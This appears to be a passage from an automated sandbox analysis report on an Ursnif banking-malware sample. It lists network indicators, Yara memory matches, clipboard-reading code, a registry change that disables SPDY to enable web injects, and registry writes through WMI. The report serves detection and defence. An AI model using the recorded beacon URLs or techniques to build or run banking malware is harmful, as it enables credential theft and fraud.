Source: global traffic HTTP traffic detected: GET /images/wlxv_2B04cU0qSkXox0E_/2FRdAxwSrR7n9stT/V9STsgmzjlsKRuR/k88cceXoSMHxI9JKEG/45kqlQZXT/Mr7Wdg8zb1vn2mq8jDkV/H2DAND_2FnqHHWcq_2F/IeOH5ot4pdOxgKfYyICZxT/XW_2BP6OR8IO0/piM1H1fK/GtYRoB7eZyHQH7fMmFYyQPb/2pz334xIn2/3AcOddbNlYuj8sfqQ/BUUXSG7Qtg9l/hS6txj_2B7F/ursUfMjLLv8Lhz/4MuP37xbl/oYbmyDVP4/a6.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
Source: global traffic HTTP traffic detected: GET /images/_2BRLy1x/4wsN2dLN7SbtqKweyBCVQVy/ncNEkpC68M/pGX_2BOwGt0R9_2BF/gPvtyZ2zCuXU/MtW7n3eg_2B/cVfCNS_2BVDqYE/NcD6s_2FvRGdMXsqfE9ud/QnKqi6Gdk85wdC67/aXmIXPep1RKvSuC/dU0LoB35OeBogincV5/_2FxALfnm/Pttx7XLPfUVU3_2FKsJC/yP8zqBt1Q2czLtOvx6I/xwix1VQVzSylmtN4_2FaYq/KZRSXLzBBanwh/lTfsORlu/JAGztGerO6_2BOMh0JL/2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2F_2BRLy1x%2F4wsN2dLN7SbtqKweyBCVQVy%2FncNEkpC68M%2FpGX_2BOwGt0R9_2BF%2FgPvtyZ2zCuXU%2FMtW7n3eg_2B%2FcVfCNS_2BVDqYE%2FNcD6s_2FvRGdMXsqfE9ud%2FQnKqi6Gdk85wdC67%2FaXmIXPep1RKvSuC%2FdU0LoB35OeBogincV5%2F_2FxALfnm%2FPttx7XLPfUVU3_2FKsJC%2FyP8zqBt1Q2czLtOvx6I%2Fxwix1VQVzSylmtN4_2FaYq%2FKZRSXLzBBanwh%2FlTfsORlu%2FJAGztGerO6_2BOMh0JL%2F2.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:44:24 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 9server: ATSContent-Length: 1084Age: 0Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=4npkagdgpqh4o&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 19:47:06 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: anIV2qJeLD.exe, 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fnIBVSTLyPt3UY%2fF_2Fx2Hc%2fBze1TT57OG4HBNl2UO4H2_2%2fF2x5eVeu_2%2fF0oEIMCthzpdl_2F0%2fg6yK5x4lAPBL%2fIfJhlJxCH88%2fkNEvL4B2xwbPkg%2fl6LFIMkoo7_2BSx2Zl9QD%2fsNqAlyxot9VgUnIt%2ftD2_2FQ67j1kKZ4%2f4sQxxRyc1y_2Bi_2BR%2fgsw9z5z81%2fv3w096aztXCXUnfe5Q%2fwc2.crw'; equals www.yahoo.com (Yahoo)
Source: anIV2qJeLD.exe, 00000001.00000002.969768372.00000000050DA000.00000004.00000010.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: unknown HTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067191125.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.894411476.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067358328.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964378185.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708655559.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826726374.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.961019371.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708643513.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826674348.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067387619.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708560736.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974756035.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067321148.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067077802.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067242360.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1069046396.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067447371.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708619404.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974847238.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.752543235.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: anIV2qJeLD.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PING.EXE PID: 2280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 6656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1380, type: MEMORYSTR
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.anIV2qJeLD.exe.3c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.4864ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.978653062.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1012362960.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1042231528.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.822930430.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.933683599.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.934438300.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.885186030.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.972065324.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.899852132.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1024798927.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.925739991.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753518401.0000000004839000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1039859823.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.895713343.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.970372197.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.887028110.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.947593693.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.936725813.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.974956334.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.825845900.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.970221418.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.961075351.0000000004299000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.883404432.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.905548648.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.968828960.00000000044C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.942244917.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918958280.00000168AA1CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1037934763.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1018627233.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_0042EEB0 _memset,_memset,GetClipboardData,_memset,_memset, 1_2_0042EEB0

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1197409376.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.754079690.00000000046BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708603588.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.892663424.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.889480040.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.989095678.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708583550.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.960938374.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964489842.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708535895.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.890926362.000002970CDCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753558505.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708632359.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067279297.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1206306739.0000027D4FA02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.880882500.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067191125.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1205830765.000001B4FB402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.894411476.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.1196630517.0000029866E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067358328.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.964378185.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708655559.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826726374.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.985827192.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.961019371.00000228E75EC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708643513.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.826674348.0000027A72C3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067387619.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708560736.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974756035.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067321148.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067077802.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067242360.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.811532515.0000000005CA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.1069046396.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1061702784.00000235C1E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1067447371.00000000036C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.708619404.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.974847238.000001F4F175C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.752543235.00000000048B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: anIV2qJeLD.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PING.EXE PID: 2280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 5844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 6656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1380, type: MEMORYSTR
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.anIV2qJeLD.exe.3c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.anIV2qJeLD.exe.4864ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.978653062.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1012362960.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1042231528.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.822930430.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.933683599.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.934438300.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.885186030.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.972065324.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.899852132.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1024798927.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.925739991.00000228E7000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.753518401.0000000004839000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1039859823.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.895713343.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.970372197.000001F4F1140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.887028110.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.947593693.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.936725813.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.974956334.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.825845900.0000000000CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.970221418.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.961075351.0000000004299000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.883404432.000002970C7F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.905548648.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.968828960.00000000044C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.942244917.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.918958280.00000168AA1CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.1037934763.0000029865350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1018627233.00000235C1B40000.00000040.00020000.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\anIV2qJeLD.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
